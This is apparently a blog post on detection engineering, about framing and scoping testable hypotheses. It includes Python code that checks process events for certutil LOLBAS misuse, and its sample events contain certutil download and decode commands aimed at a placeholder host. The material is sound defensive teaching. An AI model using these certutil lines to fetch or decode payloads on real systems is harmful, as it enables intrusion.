What is Detection Engineering?
Let's use a fish analogy to unpack the struggle and nuance of Detection Engineering.
When you first start looking at your security program, its preventive controls, and the gaps that inherently sit between the layers of a layered security approach, you may ask yourself: “where do I even begin?”…or is that just me?
glances at the dictionary…
A hypothesis is a supposition or proposed explanation made on the basis of limited evidence as a starting point for further investigation.
To me, that means I should draft a statement based on initial observations or a limited understanding of something. What’s key here is that a good hypothesis is stated in a way that gives it a clear outcome that can be tested: a result that would confirm it and a result that would refute it.
I also want to point out that the definition above specifically uses the word evidence. Without evidence we’re working from bias, which is not the way to go. All I’m saying is that it’s easy to look at an observation and jump to a conclusion. Evidence and fact are what matter.
The fabrication of understanding beyond the scope of available evidence is a biased perception of reality.
Therein lies the whole point of a hypothesis: to create a supposition with the explicit understanding that we DO NOT know the whole truth.
That pursuit of truth is the scientific method, which made the hypothesis a tool for continual discovery, verification, and alignment of what we know. Egos need not apply.
I understand that our education system has taught us to value positive results over negative ones, but the whole point of a hypothesis is to evaluate whether the supposition is true or false. Both outcomes are good; one just requires a little more work…
True, and we’ve shown that the observation and our understanding of cause and effect were correct. Before we start passing out high-fives, we should spend time evaluating whether bias crept into our testing process: did the test only look where we expected to find confirmation? Our brains are engineered to make sense of things and find answers; bias is a human condition we must be aware of in order to combat it.
False, and we’ve shown that we were incorrect. Dust yourself off and know that you’ve demonstrated one way in which your hypothesis does not hold. Apply the new knowledge, adjust, test, and repeat.
“There are two possible outcomes: if the result confirms the hypothesis, then you’ve made a measurement. If the result is contrary to the hypothesis, then you’ve made a discovery.” - Enrico Fermi
I personally love digging into interesting things and “following rabbit holes”, but that isn’t an efficient use of my time when the goal is to systematically find truths, close knowledge gaps and, hopefully, solve problems.
When creating a hypothesis, we must consider its scope. We have to consider the realities of our time, resources, skill, knowledge, and the availability of tools and methods to test it. We’re still proving Einstein’s theories correct in 2023; it can take a frustrating amount of time for the right elements to come together for a hypothesis to be tested.
Suppose I hypothesise that a threat actor is using a known LOLBAS technique across our estate of endpoints. What shapes the scope of this hypothesis?
Which endpoints can we actually test: none, some, maybe all of them? With unlimited time and resources, what might we accomplish? Unfortunately, that isn’t realistic for nearly all of us, and a result from a subset of endpoints only tells us about that subset. Something about an elephant and small bites is appropriate here.
I hear you, a lack of examples bothers me too, but for this one, I think you have to go it alone.
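As an added illustration of what a testable statement of the LOLBAS hypothesis above could look like (this is editor-added example code, not the author’s; the chosen technique, the event fields and the sample events are my assumptions), here is the hypothesis encoded as a check and run over constructed process-creation events, once against a small sample of hosts and once against the whole estate:

```python
# Added example, not code from the original post. The hypothesis, the event
# fields and the sample events below are my assumptions for illustration.
from dataclasses import dataclass, field

# Constructed process-creation events (not real telemetry). Fields are
# assumed: host, parent image, image, and full command line.
EVENTS = [
    {"host": "ws-01", "parent": "explorer.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://example.test/a.txt a.txt"},
    {"host": "ws-02", "parent": "msiexec.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -verify -urlfetch cert.cer"},
    {"host": "ws-02", "parent": "cmd.exe", "image": "certutil.exe",
     "cmdline": "certutil.exe -decode payload.b64 payload.exe"},
    {"host": "ws-03", "parent": "explorer.exe", "image": "notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
    {"host": "srv-01", "parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs"},
]

# Every endpoint we are responsible for; the hypothesis claims something about all of them.
ESTATE = {"ws-01", "ws-02", "ws-03", "srv-01"}

# Hypothesis: "certutil.exe is being used as a LOLBAS download/decode primitive
# on endpoints in scope". The observable that would confirm it is certutil
# launched with one of these flags.
LOLBAS_FLAGS = ("-urlcache", "-decode")


def matches(event: dict) -> bool:
    """True when the event is the observable the hypothesis predicts."""
    if event["image"].lower() != "certutil.exe":
        return False
    # Compare whole arguments so that e.g. "-urlfetch" is not mistaken for "-urlcache".
    args = event["cmdline"].lower().split()
    return any(flag in args for flag in LOLBAS_FLAGS)


@dataclass
class Result:
    """Outcome of one test, carrying the scope so the verdict cannot overreach it."""
    scope: set
    hits: dict = field(default_factory=dict)  # host -> matching command lines

    @property
    def supported(self) -> bool:
        return bool(self.hits)

    @property
    def coverage(self) -> float:
        """Fraction of the estate actually examined; a 'false' only refutes within this."""
        return len(self.scope) / len(ESTATE)

    def verdict(self) -> str:
        if self.supported:
            return f"supported: {len(self.hits)} of {len(self.scope)} in-scope hosts show the observable"
        return f"not supported on the {len(self.scope)} hosts checked ({self.coverage:.0%} of the estate)"


def check_hypothesis(events: list, scope) -> Result:
    """Run the check over the events of the hosts in scope and return a scoped result."""
    result = Result(scope=set(scope))
    for ev in events:
        if ev["host"] in result.scope and matches(ev):
            result.hits.setdefault(ev["host"], []).append(ev["cmdline"])
    return result


if __name__ == "__main__":
    # Limited evidence first: a two-host sample, then the whole estate.
    print(check_hypothesis(EVENTS, {"ws-03", "srv-01"}).verdict())
    print(check_hypothesis(EVENTS, ESTATE).verdict())
```

Run on the sample, the hypothesis comes back not supported, but the result also says it only covered half the estate, so it refutes nothing about the other hosts. Run on the whole estate, it is supported on two hosts, and the benign certutil -verify -urlfetch event on ws-02 is correctly not counted. Carrying the scope inside the result is the point: it stops a verdict from a few endpoints being read as a statement about all of them.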
I firmly believe it’s the journey that provides the most value here. Yes, you may make a terrible hypothesis, but that pain of attempting to test a shitty hypothesis is the kind of real-world feedback needed to ultimately correct yourself and reinforce good habits.
Again, remember that we’re naturally injecting bias in our processes as we yearn to make sense of the things we don’t quickly understand. We need to go through the motions of evaluating, testing, and yes, being disappointed with the outcomes so that we can improve.
Attitude, disposition, and a willingness to be okay with being wrong are the key attributes for honing and applying the scientific method to the challenges you face.